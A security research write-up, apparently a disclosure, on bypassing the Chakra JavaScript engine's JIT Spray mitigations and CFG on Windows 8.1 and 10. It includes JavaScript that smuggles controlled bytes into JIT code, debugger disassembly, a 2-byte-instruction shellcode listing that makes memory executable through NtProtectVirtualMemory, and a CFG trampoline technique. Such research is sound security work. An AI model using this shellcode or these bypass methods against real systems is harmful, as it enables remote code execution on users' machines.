Constant Blinding is the most important mitigation strategy against JIT Spray. Chakra engine use a randomly generated key to XOR every user inputted immediate value that is not 0x0000 or 0xFFFF, and decrypts it on the fly. For example, the following JavaScript:

a ^= 0x90909090;
a ^= 0x90909090;
a ^= 0x90909090;

Generates machine code like this:

096b0091 ba555593c5      mov     edx,0C5935555h
096b0096 81f2c5c50355    xor     edx,5503C5C5h
096b009c 33fa            xor     edi,edx
096b009e bab045edfb      mov     edx,0FBED45B0h
096b00a3 81f220d57d6b    xor     edx,6B7DD520h
096b00a9 33fa            xor     edi,edx
096b00ab baef85f139      mov     edx,39F185EFh
096b00b0 81f27f1561a9    xor     edx,0A961157Fh
096b00b6 33fa            xor     edi,edx

The immediate value in the resulting machine code is unpredictable, thus shellcode embedding is not possible.

0x02 Bypass Chakra’s Constant Blinding on Windows 8.1 or Older Operating Systems

Internally, for integer n, it is stored as n*2+1 by Chakra engine. When evaluating the expression n=n+m, it is not necessary to restore the original value of n before adding m, its result can be obtained by directly adding m*2 to n*2+1. Chakra engine on Windows 8.1 and older operating systems treat m*2 as self-generated data rather than user input, so constant blinding does not apply. For the following JavaScript code:

a += 0x18EB9090/2;
a += 0x18EB9090/2;

When some conditions are met, could generate machine code like this:

05010090 81c19090eb18    add     ecx,18EB9090h
05010096 0f80d6010000    jo      05010272
0501009c 8bf9            mov     edi,ecx
0501009e 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100a1 f6c301          test    bl,1
050100a4 0f8413020000    je      050102bd
050100aa 8bcb            mov     ecx,ebx
050100ac 81c19090eb18    add     ecx,18EB9090h
050100b2 0f8005020000    jo      050102bd
050100b8 8bf9            mov     edi,ecx
050100ba 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100bd f6c301          test    bl,1
050100c0 0f8442020000    je      05010308
050100c6 8bcb            mov     ecx,ebx
0:017> u 05010090 + 2 l 3
05010092 90              nop
05010093 90              nop
05010094 eb18            jmp     050100ae
0:017> u 050100ae l 3
050100ae 90              nop
050100af 90              nop
050100b0 eb18            jmp     050100ca

If we could make each instruction in our shellcode not larger than 2 bytes, it could be embedded in the immediate value. The actual immediate value is 2 times of the value in JavaScript, so the first byte must be an even number if we use a 2-byte instruction, which is not very hard to satisfy.

0x5854   // push esp--pop eax    ; eax = esp, make eax writeable
0x5252   // push edx--push edx   ; esp -= 8
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0x5E52   // push edx--pop esi    ; esi = 0
0x40B6   // mov  dh, 0x40        ; edx = 0x4000, NumberOfBytesToProtect
0x5452   // push edx--push esp   ; *esp = &NumberOfBytesToProtect
0x5B90   // pop  ebx             ; ebx = &NumberOfBytesToProtect
0x14B6   // mov  dh, 0x14
0x14B2   // mov  dl, 0x14
0x5266   // push dx
0x5666   // push si              ; *esp = 0x14140000
0x525A   // pop  edx-push edx    ; edx = 0x14140000
0x5E54   // push esp--pop  esi   ; esi = &BaseAddress, 
0x5454   // push esp--push esp   ; push &OldAccessProtection 
0x406A   // push 0x40            ; PAGE_EXECUTE_READWRITE
0x5390   // push ebx             ; push  &NumberOfBytesToProtect
0x5690   // push esi             ; push &BaseAddress
0xFF6A   // push -1              ; 
0x5252   // push edx--push edx   ; set ret addr
0x5290   // push edx             ; prepare esp for fs:[esi]
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0xC0B2   // mov  dl, 0xC0
0x5E52   // push edx--pop esi
0x5F54   // push esp--pop edi
0xA564   // movs dword ptr [edi], dword ptr fs:[esi] ; *esp = *(fs:0xC0)
0x4FB2   // mov  dl, 0x50        ; NtProtectVirtualMemory, Win8.1:0x4F, Win10:0x50
0x5290   // push edx
0xC358   // pop  eax--ret        ; ret to syscall

0x03 Bypass Chakra’s Constant Blinding on Windows 10

Chakra engine on Windows 10 does not suffer from this issue. But in order to generate highly optimized code, when writing to an integer array, the following JavaScript code:

var ar = new Uint16Array(0x10000);
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;

Generates the following machine code:

0b8110e0 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110e9 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110f2 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110fb 66c786909000009090 mov   word ptr [esi+9090h],9090h

To mitigate against JIT Spray, Chakra only allows user to control at most 2 bytes of immediate value. But in this specific situation, the array index and the value being written appear in one instruction. Now we can control 4 bytes instead of 2 bytes of data.

Previously discussed 2-byte shellcode can also be used here. Due to the additional 2-byte 0x00 (which will be interpreted as “add byte ptr[eax], al”), we need to make the eax point to a writable location in the first two instruction.

0x04 Using Chakra Engine to Bypass CFG

By using previously discussed methods, we can do a JIT Spray to bypass DEP, but the shellcode entry point address embedded in the JIT’d code obviously cannot pass the CFG check. But actually, there are implementation flaws in Chakra engine itself that can be exploited to bypass CFG.

There is a fixed entry point function that always gets generated regardless of the need of JIT of the currently executing JavaScript code:

0:017> uf 4ff0000
04ff0000 55          push  ebp
04ff0001 8bec        mov   ebp,esp
04ff0003 8b4508      mov   eax,dword ptr [ebp+8]
04ff0006 8b4014      mov   eax,dword ptr [eax+14h]
04ff0009 8b4840      mov   ecx,dword ptr [eax+40h]
04ff000c 8d4508      lea   eax,[ebp+8]
04ff000f 50          push  eax
04ff0010 b840cb5a71  mov   eax, 715acb40h ; jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>
04ff0015 ffe1        jmp   ecx

This function address can pass the CFG check. Also, before jmp ecx, there is no CFG check of the target address. This can be used as a trampoline for jumping to arbitrary address. We will call it “cfgJumper” hereafter.

0x05 Locating JIT Memory and cfgJumper

Locating the JIT compiled code and the cfgJumper are needed if we want to use JIT Spray to bypass DEP and use cfgJumper to bypass CFG. Interestingly, the method of locating both are almost identical.

Every JavaScript function has a corresponding Js::ScriptFunction object. Every Js::ScriptFunction object also includes a Js::FunctionBody object. Inside this Js::FunctionObject object, a function pointer to the actual function entry point is stored.

If a function is never called, this function pointer points to Js::InterpreterStackFrame::DelayDynamicInterpreterThunk:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@........... // Js::ScriptFunction
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 70181720 00000001 00000000  p..o ..p........ // Js::FunctionBody
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 70181720 l 1
70181720 55              push    ebp

If a function has been called before, but never compiled into JIT’d code, this function pointer points to cfgJumper:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 00860000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00860000
00860000 55          push  ebp
00860001 8bec        mov   ebp,esp
00860003 8b4508      mov   eax,dword ptr [ebp+8]
00860006 8b4014      mov   eax,dword ptr [eax+14h]
00860009 8b4840      mov   ecx,dword ptr [eax+40h]
0086000c 8d4508      lea   eax,[ebp+8]
0086000f 50          push  eax
00860010 b800240870  mov   70082400h ; Chakra!Js::InterpreterStackFrame::InterpreterThunk
00860015 ffe1        jmp   ecx

If a function is regularly called and Chakra compiles it into JIT’d code, this function pointer points to the actual code:

0:002> d 0b89de70 l8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> d 0b8d0000 l8
0b8d0000  6ff6c970 00950000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00950000
00950000 55              push    ebp
00950001 8bec            mov     ebp,esp
00950003 81fc44c9120b    cmp     esp,0B12C944h
00950009 7f18            jg      00950023
0095000b 6a00            push    0
0095000d 6a00            push    0
0095000f 68e0c72c07      push    72CC7E0h
00950014 6844090000      push    944h

With understandings of the internal structure of Js::ScriptFunction and Js::FunctionBody, we could precisely locate the JIT’d code and the cfgJumper.

0x06 Avoiding Randomly Inserted NOP instructions

Other than constant blinding, Chakra engine also employs randomized NOP instruction insertion to mitigate JIT Spray. But the density of the insertion is rather low. Testing code combines 29 16-bit number to form a shellcode, only 29 x86 instructions are generated on Windows 10, with virtually no NOP instruction inserted in between. But in the exploitation method used on Windows 8.1 and older operating systems, about 200 x86 instruction are generated, and highly likely to contain NOP instructions.

To solve this problem:
1. Create a new script tag, put in a JavaScript function that contains JIT shellcode.
2. Call this function in a loop to trigger JIT compilation.
3. Read in compiled code to determine if there is any NOP instruction inserted.
4. If any, destroy the script tag and repeat this procedure.

Testing environments are Windows 8.1 with all updates till May 2015 and Windows 10 TP 9926.
Microsoft informed me that it has been fixed in September 2015.